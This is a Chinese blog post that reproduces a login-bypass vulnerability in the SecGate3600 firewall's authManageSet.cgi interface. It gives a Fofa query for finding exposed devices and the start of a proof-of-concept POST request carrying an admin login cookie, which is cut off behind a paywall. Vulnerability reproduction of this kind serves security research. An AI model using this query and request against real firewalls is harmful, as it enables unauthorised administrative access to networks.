奇安信网神SecGate3600防火墙authManageSet.cgi 接口登录绕过(含批量验证poc)

已于 2024-04-04 21:05:37 修改
阅读量180 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 网络 安全 web安全
于 2024-04-04 21:05:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137382531
版权
这篇博客介绍了奇安信网神SecGate3600防火墙的一个安全漏洞,该漏洞允许攻击者通过authManageSet.cgi接口实现登录绕过,获取管理员权限并可能控制系统。文章详细说明了漏洞描述、影响版本,并提供了漏洞复现的POC。
摘要由CSDN通过智能技术生成

简介

SecGate3600是网神信息技术(北京)股份有限公司旗下一款安全网关产品

漏洞描述

网神 SecGate3600 存在登录绕过漏洞,攻击者利用该漏洞可获取管理员密码等敏感信息,进一步控制系统

影响版本

奇安信网神SecGate3600
 


Fofa:

body="sec_gate_image/login_02.gif"

漏洞复现

POST /cgi-bin/authUser/authManageSet.cgi HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded
Cookie: sw_login_name=admin
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
专栏目录
订阅专栏
奇安信网神SecGate3600防火墙authManageSet.cgi接口登录绕过
weixin_43567873的博客
03-08 327
奇安信网神SecGate3600防火墙authManageSet.cgi接口登录绕过
网神SecGate 3600安全网关命令行手册.doc
08-03
本手册是SecGate 3600安全网关管理员手册中的一本,主要介绍如何通过终端的命令行(Command Line Interface,以下简称CLI)方式对SecGate 3600安全网关进行配置管理。 本手册适用于负责支持、维护SecGate 3600安全网关的安全管理员,是对SecGate 3600安全网关配置管理的必备手册。 使用本手册的读者,应首先掌握TCP/IP 协议、IP 地址及子网掩码等基本知识。
奇安信 网神SecGate 3600防火墙 (相关问题整理)
呦菜呦爱玩的博客
05-30 1390
本文所有问题,基于实际项目中出的问题,设备:网神SecGate 3600防火墙
网神SecGate 3600防火墙NSG系列快速入门指南V4.0.pdf
12-20
网神SecGate 3600防火墙NSG系列快速入门指南V4.0.pdf,公司购买该防火墙光盘中所带文档拷贝而出
360网神防火墙系统 (NSG 系列)技术白皮书(奇安信版).pdf
04-08
360网神防火墙系统 (NSG 系列)技术白皮书(奇安信版)这个pdf文件是我收集的奇安信大佬写的介绍360网神防火墙的产品特色、各个强大的功能、剖析其技术优势,结合实际展示其应用场景,是一份超级不错的帮助文档
奇安信网神SecGate3600防火墙authManageSet
code8889的博客
04-12 1366
SecGate3600网神信息技术(北京)股份有限公司旗下一款安全网关产品。
网神 SecGate3600 authManageSet.cgi信息泄露漏洞复现
0xSec
12-13 1211
网神SecGate 3600authManageSet.cgi 接口存在敏感信息泄露漏洞,未授权得攻击者可以通过此漏洞获取控制台管理员用户名密码等凭据,可登录控制整个后台,使系统处于极不安全的状态
网神 SecGate3600 authManageSet.cgi信息泄露漏洞(批量验证poc
weixin_43567873的博客
04-05 70
网神 SecGate3600 authManageSet.cgi信息泄露漏洞(批量验证poc
网神SecGate 3600防火墙 obj_app_upfile接口任意文件上传漏洞复现 [附POC]
薛定谔嘚喵博客
12-08 111
网神 SecGate 3600 防火墙 obj_app_upfile接口存在任意文件上传漏洞,攻击者通过构造特殊请求包即可获取服务器权限。
奇安信网神防火墙系统(NSG系列)用户手册【6.1.10.51756_02】.pdf
08-24
本手册主要介绍 360 网神防火墙 Web 管理界面支持的各项功能及配置步骤
奇安信网康科技防火墙远程命令执行
qq_36334672的博客
02-01 375
fofa:app=“网康科技-下一代防火墙奇安信网康下一代防火墙(NGFW)
奇安信网神任意文件上传漏洞
qq_36334672的博客
02-04 545
奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传漏洞。
奇安信_网神防火墙_透明桥模式部署
热门推荐
呦菜呦爱玩的博客
03-24 1万+
客户网络中新增加一台防火墙,客户要求不改变网络原有架构,现提供2种部署方案 1. 镜像旁挂:交换机做镜像,将原本流量复制一份,引入防火墙,可以查看威胁流量,但是对威胁的限制较弱 2. 透明桥:将防火墙串入网络,运用桥接口,将出入流量捆绑为一个桥,不用修改原网络的IP 客户选择使用透明桥模式部署 ## 拓扑图 ![在这里插入图片描述](https://img-blog.csdnimg.cn/8d77601268874662a56b82f06383f4a9.png) ## 配置 ## 1. 登录web控制台
奇安信防火墙配置手册_新边界防御的变革 奇安信正式发布软件定义防火墙
weixin_39636057的博客
11-25 2465
10月12日,第三届数字中国建设峰会在福州正式开幕。作为数字中国建设成果发布的重要一环,奇安信正式对外发布软件定义防火墙新品,该产品旨在应对数字化转型浪潮下,企业客户面临网络基础架构变革所带来的新问题。此次全新发布的奇安信软件定义防火墙,以功能完备的下一代防火墙作为底层平台,向上融合虚拟化能力,实现了全生命周期的VNF管理,可以通过VNF的方式弹性、敏捷地扩展多种安全组件,并以成熟、可靠、性能优异...
Linux 再入门整理:详解 /etc/fstab 文件
一只奋斗的猪
10-01 1171
`/etc/fstab` 文件是 Linux 系统中用于定义和管理文件系统的挂载信息的配置文件。它的作用是告诉系统在启动时,应该如何自动挂载各种文件系统。挂载是 Linux 操作系统中一种将存储设备与目录树关联的操作。通过挂载,存储设备中的文件可以通过目录访问。
项目管理-信息技术发展
最新发布
GAVIN
10-04 325
对称加密:DES 3DES AES RC5 IEDA SM1 SM4。2)分类:PAN LAN MAN WAN 公用网 专用网。4)数据结构模型 层次模型 网状模型 关系模型。1)存储 分类:DAS FAS NAS SAN。物联网(IoT) 感知层 网络层 应用层。8) 5G 高速率 低时延 大连接。设备安全 数据安全 内容安全 行为安全。4.信息安全 保密性 完整性 可用性。3)网络协议 语法 语义 时许。5)IEEE 802 规范。6)TCP/IP 协议。4)网络标准协议 7层。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值